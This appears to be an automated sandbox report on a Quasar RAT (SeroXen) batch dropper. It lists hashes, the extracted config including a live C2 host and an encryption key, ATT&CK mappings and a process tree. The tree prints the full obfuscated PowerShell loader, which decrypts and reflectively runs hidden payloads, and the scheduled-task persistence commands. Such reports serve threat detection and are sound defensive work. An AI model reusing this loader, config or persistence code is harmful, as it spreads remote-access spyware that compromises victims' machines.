quasar | 38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7

General

Target

$sxr-Uni.bat
Size

1004KB
MD5

87135909ef2fbb7168cd05d0e39fa129
SHA1

1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799
SHA256

38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7
SHA512

93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547
SSDEEP

24576:Aj9+DnG6YVMFMTnd9x6osRvWc2mjJRiW7+wjHRjX:NGppndjT6dxjX

Score

10^/10

quasar seroxen execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

uk2.localto.net:3362

Mutex

$Sxr-CHcUwDREE2aL5huOTd

Attributes

encryption_key
8v1KwkaFypjEiZ1Virk0
install_name
Client.exe
log_directory
$sxr-cmd
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3628-22-0x0000000008780000-0x0000000008872000-memory.dmp	family_quasar
behavioral2/memory/4368-77-0x0000000007090000-0x0000000007182000-memory.dmp	family_quasar
behavioral2/memory/4368-82-0x0000000008460000-0x00000000084CC000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe	family_quasar
behavioral2/memory/3916-100-0x0000000000D70000-0x0000000000DDC000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3628 powershell.exe
4468 powershell.exe
4368 powershell.exe

pid	process
3628	powershell.exe
4468	powershell.exe
4368	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

Processes:

$sxr-Uni.exe

pid process

3916 $sxr-Uni.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3916	$sxr-Uni.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

SCHTASKS.exe

pid process

5080 SCHTASKS.exe

pid	process
5080	SCHTASKS.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3628 powershell.exe
3628 powershell.exe
4468 powershell.exe
4468 powershell.exe
4368 powershell.exe
4368 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	powershell.exe

pid	process
3628	powershell.exe
3628	powershell.exe
4468	powershell.exe
4468	powershell.exe
4368	powershell.exe
4368	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	powershell.exe
Token: SeSecurityPrivilege	4468	powershell.exe
Token: SeTakeOwnershipPrivilege	4468	powershell.exe
Token: SeLoadDriverPrivilege	4468	powershell.exe
Token: SeSystemProfilePrivilege	4468	powershell.exe
Token: SeSystemtimePrivilege	4468	powershell.exe
Token: SeProfSingleProcessPrivilege	4468	powershell.exe
Token: SeIncBasePriorityPrivilege	4468	powershell.exe
Token: SeCreatePagefilePrivilege	4468	powershell.exe
Token: SeBackupPrivilege	4468	powershell.exe
Token: SeRestorePrivilege	4468	powershell.exe
Token: SeShutdownPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeSystemEnvironmentPrivilege	4468	powershell.exe
Token: SeRemoteShutdownPrivilege	4468	powershell.exe
Token: SeUndockPrivilege	4468	powershell.exe
Token: SeManageVolumePrivilege	4468	powershell.exe
Token: 33	4468	powershell.exe
Token: 34	4468	powershell.exe
Token: 35	4468	powershell.exe
Token: 36	4468	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	powershell.exe
Token: SeSecurityPrivilege	4468	powershell.exe
Token: SeTakeOwnershipPrivilege	4468	powershell.exe
Token: SeLoadDriverPrivilege	4468	powershell.exe
Token: SeSystemProfilePrivilege	4468	powershell.exe
Token: SeSystemtimePrivilege	4468	powershell.exe
Token: SeProfSingleProcessPrivilege	4468	powershell.exe
Token: SeIncBasePriorityPrivilege	4468	powershell.exe
Token: SeCreatePagefilePrivilege	4468	powershell.exe
Token: SeBackupPrivilege	4468	powershell.exe
Token: SeRestorePrivilege	4468	powershell.exe
Token: SeShutdownPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeSystemEnvironmentPrivilege	4468	powershell.exe
Token: SeRemoteShutdownPrivilege	4468	powershell.exe
Token: SeUndockPrivilege	4468	powershell.exe
Token: SeManageVolumePrivilege	4468	powershell.exe
Token: 33	4468	powershell.exe
Token: 34	4468	powershell.exe
Token: 35	4468	powershell.exe
Token: 36	4468	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	powershell.exe
Token: SeSecurityPrivilege	4468	powershell.exe
Token: SeTakeOwnershipPrivilege	4468	powershell.exe
Token: SeLoadDriverPrivilege	4468	powershell.exe
Token: SeSystemProfilePrivilege	4468	powershell.exe
Token: SeSystemtimePrivilege	4468	powershell.exe
Token: SeProfSingleProcessPrivilege	4468	powershell.exe
Token: SeIncBasePriorityPrivilege	4468	powershell.exe
Token: SeCreatePagefilePrivilege	4468	powershell.exe
Token: SeBackupPrivilege	4468	powershell.exe
Token: SeRestorePrivilege	4468	powershell.exe
Token: SeShutdownPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeSystemEnvironmentPrivilege	4468	powershell.exe
Token: SeRemoteShutdownPrivilege	4468	powershell.exe
Token: SeUndockPrivilege	4468	powershell.exe
Token: SeManageVolumePrivilege	4468	powershell.exe
Token: 33	4468	powershell.exe
Token: 34	4468	powershell.exe
Token: 35	4468	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe$sxr-Uni.exe

description	pid	process	target process
PID 1240 wrote to memory of 3628	1240	cmd.exe	powershell.exe
PID 1240 wrote to memory of 3628	1240	cmd.exe	powershell.exe
PID 1240 wrote to memory of 3628	1240	cmd.exe	powershell.exe
PID 3628 wrote to memory of 4468	3628	powershell.exe	powershell.exe
PID 3628 wrote to memory of 4468	3628	powershell.exe	powershell.exe
PID 3628 wrote to memory of 4468	3628	powershell.exe	powershell.exe
PID 3628 wrote to memory of 888	3628	powershell.exe	WScript.exe
PID 3628 wrote to memory of 888	3628	powershell.exe	WScript.exe
PID 3628 wrote to memory of 888	3628	powershell.exe	WScript.exe
PID 888 wrote to memory of 1840	888	WScript.exe	cmd.exe
PID 888 wrote to memory of 1840	888	WScript.exe	cmd.exe
PID 888 wrote to memory of 1840	888	WScript.exe	cmd.exe
PID 1840 wrote to memory of 4368	1840	cmd.exe	powershell.exe
PID 1840 wrote to memory of 4368	1840	cmd.exe	powershell.exe
PID 1840 wrote to memory of 4368	1840	cmd.exe	powershell.exe
PID 4368 wrote to memory of 3916	4368	powershell.exe	$sxr-Uni.exe
PID 4368 wrote to memory of 3916	4368	powershell.exe	$sxr-Uni.exe
PID 4368 wrote to memory of 3916	4368	powershell.exe	$sxr-Uni.exe
PID 4368 wrote to memory of 3980	4368	powershell.exe	wermgr.exe
PID 4368 wrote to memory of 3980	4368	powershell.exe	wermgr.exe
PID 4368 wrote to memory of 3980	4368	powershell.exe	wermgr.exe
PID 3916 wrote to memory of 5080	3916	$sxr-Uni.exe	SCHTASKS.exe
PID 3916 wrote to memory of 5080	3916	$sxr-Uni.exe	SCHTASKS.exe
PID 3916 wrote to memory of 5080	3916	$sxr-Uni.exe	SCHTASKS.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_697_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_697.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_697.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_697.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_697.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_697.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4368

C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe
"C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe"
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3916

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77$sxr-Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe'" /sc onlogon /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5080

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4368" "2400" "2512" "2880" "0" "0" "2888" "0" "0" "0" "0" "0"
6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3980

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
55d32bc1c206428fe659912b361362de

SHA1
7056271e5cf73b03bafc4e616a0bc5a4cffc810f

SHA256
37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff

SHA512
2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
85639825784c47aecc840e1933f806c4

SHA1
c2fd4b6d92b50cce4e6107bcc2233f1a130c173f

SHA256
cdbda3be857d92084114f2d5565fd1943d3345bae4469c50a8725bbb4ada5ab8

SHA512
351049ec41765a6cb420500aff063a8946042ff9e8533f3d834a06ddd550826ab9fa7c4e451983d8e415586a17f8ccb28f9f4d99b3ca174607abadf8870c28f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe
Filesize
409KB

MD5
95b900961b79bdde26d9aa9b7dd0d45f

SHA1
fa92ee8cb299cb3e7565c4d8fe5071a902e2fd08

SHA256
a3c2d3cb1d3aac5f6a85fcc8654d1f36671b4d0d9cb49c8187dc973fdc4637f0

SHA512
6cc027d2b156842274fc170d9dc3bf62274fecd06af8cc863d0101e559605cfc162f43fdd2fe2798446d7717b25b244365d96a6891fe7f07d01fc1e8f53bb2ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize
164KB

MD5
bec10290154b8590c20abe2e49096d21

SHA1
ac36297e505124cdf3db5f07ee595cb1d95187ea

SHA256
a0739bd54451695e2a7861a6845c59079b8a08d4543f883ec63fc3d5ac357107

SHA512
583b0e21f13fcbc3b5a02018b30baa8fb0180ff43b7aa8cf21cfde47122cf632d5452b311bcbc2dc1acc6587510a764b01984e9b567bbec9bfadbbb4e76cf97d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_utk0z3ij.i52.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_697.bat
Filesize
1004KB

MD5
87135909ef2fbb7168cd05d0e39fa129

SHA1
1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799

SHA256
38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7

SHA512
93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_697.vbs
Filesize
115B

MD5
0c1a03bd78db4fc1adc5519a8b15a70d

SHA1
bdc0e8b1a1f38198800a3090cd08a4251f93ba15

SHA256
f9842524d069eb57289535860626fc0728cb6fbc9c5719034b1d28b8e693defe

SHA512
1142f0d8ab94e6455368d8609c544646208b483c1dd713f6c5613c2fc9f81e0b936976222adad72afcadccc07f35b5881d23d9d23c784953474ccfe6658f7822

Download Submit
memory/3628-18-0x0000000006550000-0x000000000659C000-memory.dmp

Filesize
304KB

Download
memory/3628-103-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download
memory/3628-17-0x0000000006510000-0x000000000652E000-memory.dmp

Filesize
120KB

Download
memory/3628-0-0x000000007532E000-0x000000007532F000-memory.dmp

Filesize
4KB

Download
memory/3628-19-0x0000000008D90000-0x000000000940A000-memory.dmp

Filesize
6.5MB

Download
memory/3628-20-0x0000000006AC0000-0x0000000006ADA000-memory.dmp

Filesize
104KB

Download
memory/3628-21-0x0000000006A60000-0x0000000006A68000-memory.dmp

Filesize
32KB

Download
memory/3628-22-0x0000000008780000-0x0000000008872000-memory.dmp

Filesize
968KB

Download
memory/3628-23-0x000000000A9C0000-0x000000000AF64000-memory.dmp

Filesize
5.6MB

Download
memory/3628-16-0x0000000006040000-0x0000000006394000-memory.dmp

Filesize
3.3MB

Download
memory/3628-6-0x0000000005FD0000-0x0000000006036000-memory.dmp

Filesize
408KB

Download
memory/3628-5-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download
memory/3628-4-0x0000000005740000-0x0000000005762000-memory.dmp

Filesize
136KB

Download
memory/3628-1-0x0000000005040000-0x0000000005076000-memory.dmp

Filesize
216KB

Download
memory/3628-3-0x0000000005850000-0x0000000005E78000-memory.dmp

Filesize
6.2MB

Download
memory/3628-2-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download
memory/3916-100-0x0000000000D70000-0x0000000000DDC000-memory.dmp

Filesize
432KB

Download
memory/4368-82-0x0000000008460000-0x00000000084CC000-memory.dmp

Filesize
432KB

Download
memory/4368-77-0x0000000007090000-0x0000000007182000-memory.dmp

Filesize
968KB

Download
memory/4368-83-0x0000000008680000-0x0000000008712000-memory.dmp

Filesize
584KB

Download
memory/4368-108-0x0000000008760000-0x0000000008772000-memory.dmp

Filesize
72KB

Download
memory/4468-25-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download
memory/4468-58-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download
memory/4468-55-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download
memory/4468-54-0x0000000007EB0000-0x0000000007EC1000-memory.dmp

Filesize
68KB

Download
memory/4468-53-0x0000000007F30000-0x0000000007FC6000-memory.dmp

Filesize
600KB

Download
memory/4468-52-0x0000000007D20000-0x0000000007D2A000-memory.dmp

Filesize
40KB

Download
memory/4468-50-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download
memory/4468-51-0x0000000007B80000-0x0000000007C23000-memory.dmp

Filesize
652KB

Download
memory/4468-48-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download
memory/4468-49-0x0000000006EE0000-0x0000000006EFE000-memory.dmp

Filesize
120KB

Download
memory/4468-38-0x0000000071140000-0x000000007118C000-memory.dmp

Filesize
304KB

Download
memory/4468-37-0x0000000007940000-0x0000000007972000-memory.dmp

Filesize
200KB

Download
memory/4468-36-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download
memory/4468-26-0x0000000075320000-0x0000000075AD0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads